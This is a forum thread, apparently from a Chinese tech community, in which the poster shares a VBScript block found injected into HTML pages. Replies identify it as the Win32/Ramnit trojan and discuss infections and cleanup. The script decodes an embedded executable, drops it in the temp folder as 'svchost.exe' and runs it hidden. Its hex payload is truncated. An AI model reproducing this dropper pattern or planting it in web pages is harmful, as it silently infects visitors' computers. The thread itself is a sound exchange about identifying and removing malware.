<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
This topic created in 3785 days ago, the information mentioned may be changed or developed.
 |
1
zhanglp888 Jan 12, 2016
Win32/Ramnit
https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRamnit dll 文件也会有问题, |
 |
2
hicdn Jan 12, 2016
这个是在服务器上看到的还是在浏览器里看到的
|
 |
3
akafeng Jan 12, 2016
这是运行一个文件, svchost.exe, 目测是木马
|
 |
4
bigtan Jan 12, 2016
中过这个病毒
|
 |
5
Moker Jan 12, 2016
前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
|
 |
6
hienchu Jan 12, 2016 via iPhone
怎么被入侵的?
|
 |
7
ibcker Jan 12, 2016
等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
|
 |
8
am241 Jan 12, 2016
这种病毒十年前就不好用了吧
|
 |
9
billyu Jan 12, 2016
我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
|
 |
11
visonme Jan 12, 2016
|
 |
12
blakefan OP 网页木马程序
|
 |
13
prondtoo Jan 29, 2016
刚弄好 nexpose ,有需要可以帮你扫一下。
|
Select Language